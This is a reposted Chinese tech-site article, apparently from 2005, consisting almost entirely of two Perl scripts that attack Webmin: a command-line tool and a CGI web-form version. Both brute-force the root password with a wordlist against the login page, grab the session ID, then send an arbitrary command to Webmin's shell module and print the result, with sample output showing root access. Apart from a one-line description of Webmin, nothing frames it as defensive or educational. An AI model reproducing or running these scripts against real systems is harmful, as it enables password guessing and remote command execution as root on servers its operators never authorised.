Webmin 暴力破解+ 执行命令-红旋风联盟-技术文档中心|RHU-Tech-Article-Center

相关联接

RHU本级分类

编程语言
 程序代码
 WIN/*NIX编程
 其他类别
 JAVA专区

RHU相关搜索

　

RHU广而告之

　

>您的位置：首页 -> 程序设计 -> 其他类别

Webmin 暴力破解+ 执行命令

作者:RHU-TAC编辑员来自:RHU网络采集时间:2005-5-26 双击滚屏收藏本页 字体:大中小

点击查看RHU2004全年文章

Webmin是一个广泛使用的，运行在linux/unix下,用浏览器来管理系统的工具。用它，你不必知道复杂的命令行，也不用了解各种复杂的配置文件，系统管理变得非常简单！可以设置帐号，配置DNS和文件共享等．

Webmin BruteForce + Command execution v1.5
#!/usr/bin/perl
################################################################################
# Webmin BruteForce + Command execution
# v1.0:By Di42lo - _2@012.net.il">DiAblo_2@012.net.il
# v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
################################################################################
#add script:
#1.wordlist func.
#2.log (line:41)
################################################################################
# usage:
# ./webmin1.pl <host> <command> <wordlist>
#./webmin1.pl 192.168.0.5 "uptime" wordlist.txt
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01
################################################################################
use IO::Socket;
if (@ARGV<3){
print "Webmin BruteForcer v1.5\n";
print "usage:\n";
print " webmin15.pl <host> <command> <wordlist>\n";
print "example:\n";
print " webmin15.pl www.abcd.com \"id\" wordlist.txt\n";
exit;
}
my $host=$ARGV[0];
my $cmd=$ARGV[1];
my $wlist=$ARGV[2];
open (data, "$wlist");
@wordlist=<data>;
close data;
$passx=@wordlist;
open(results , ">$host.log");
print results "#############################\n";
print results "Webmin BruteForce + Command execution v1.5\n";
print results "Host:$host\n";
print results "#############################\n";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 10);
if(!$sock){
print "[-] Webmin on this host does not exist\n";
print results "[-] Webmin on this host does not exist\n";
exit;
}else{
$sock->close;
print "[+] BruteForcing...\n";
}
my $sid;
$n=0;
while ($chk!=1) {
$n++;
if($n>$passx){
exit;
}
$pass=@wordlist[$passx-$n];
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 10);
if ($sock){
print "[+] trying to enter with: $pass\n";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/sid=(.*);/g){
$chk=1;
$sid=$1;
print "[+] Found SID : $sid\n";
print "[+] Password : $pass\n";
print results "[+]:Password:$pass\nSid:$sid\n";
}
}
}
$sock->close;
print results "[-]$pass\n";
}
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout => 10);
if(!$sock){
print "[-] Cant Connect once again for command execution\n";
print results "[-] Cant Connect once again for command execution\n";
}
print "[+] Connected.. Sending Buffer\n";
my $temp="-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"cmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock){
print "[+] Buffer sent...running command $cmd\n";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
if ($answer=~/<td><pre><b>>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/<\/pre><\/td><\/tr>/g){
exit;
} else {
print $answer;
print results "[+]$answer\n";
}
}
}
}
#!/usr/bin/perl
use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI = new CGI;
$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");
print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
print qq~<html><head><meta http-equiv=Content-Type" content=text/html;
charset=ISO-8859-9><title>Webmin Web Brute Force v1.5 - cgi
versiyon</title></head>
<body bgcolor=black text=red>Webmin Web Brute Force v1.5 - cgi versiyon<br>
<font color=blue>
Webmin BruteForce + Command execution- cgi version<br>
v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il<br>
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com<br>
</font>~;
if($atak eq "webmin") {
open (data, "$wlist");
@wordlist=<data>;
close data;
$passx=@wordlist;
$chk=0;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not
exist\r\n";
$sock->close;
print "[+] BruteForcing...<br>";
$sid;
$n=0;
while ($chk!=1) {
$n++;
if($n>$passx){
exit;
}
$pass=@wordlist[$passx-$n];
$pass_line="page=%2F&user=root&pass=$pass";
$buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
$line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 25);
if ($sock){
print "[+] Denenen sifre: $pass<br>";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/sid=(.*);/g){
$chk=1;
$sid=$1;
print "[+] Found SID : $sid<br>";
print "[+] Sifre : $pass<br>";
}
}
}
$sock->close;
}
print "[+] Connecting to host once again<br>";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout => 10) || die "[-] Cant Connect once again for command
execution\n";
print "[+] Connected.. Sending Buffer<br>";
$temp="-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"cmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
$buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock){
print "[+] Buffer sent...running command $cmd<br>";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/defaultStatus="(.*)";/g) { print $1."<br>";}
if ($answer=~/<td><pre><b>>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/<\/pre><\/td><\/tr>/g){
exit;
} else {
print $answer;
}
}
}
}
}
if($atak eq ""){
print qq~
<table align=left cellspacing="0" cellpading="0"><form aciton=?><input
type=hidden name=atak value=webmin>
<tr><td colspan="3" align=center>Webmin Web Brute Force v1.5 - cgi
version</td></tr>
<tr><td>Server:</td><td colspan="2"><input type="text" name="host" size="50"
value="www."></td></tr>
<tr><td valign="top">Wordlist:</td><td valign="top"><input type="file"
name="wlist"></td><td valign="top"
align="left">Examples:<br>---------<br>admin<br>administrator<br>redhat<br>mandrake<br>suse<br></td></tr>
<tr><td>Cmd:</td><td colspan="2"><input type="text" name="cmd" size="50"
value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr>
</form></table></body></html>~;

摘自:http://lams.blogchina.com

OVER

第[1] 页

RedHyphone.Union 投稿邮箱

[特别声明]:
①本站文章大多搜索转载自网络中，如果侵犯了您的权利，请告之我们。本站将立即删除。
②本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有。

【查看评论】【向上滚屏】【关闭窗口】【大中小】【打印】

-相关文章

openSUSE 11.1 Final - 正式发布

[视频]Opera Mini 4.2 正式版发布

dll注入系统进程(开源代码)

认知盲区解惑双网卡双线路DNS解析

FlashFXP 简体中文版 3.7.5 Build 1303 Beta[烈火]

-文章评论 (关闭)

·还没有相关的评论！

网上大名：

红旋风网络技术联盟　RHUTech.Union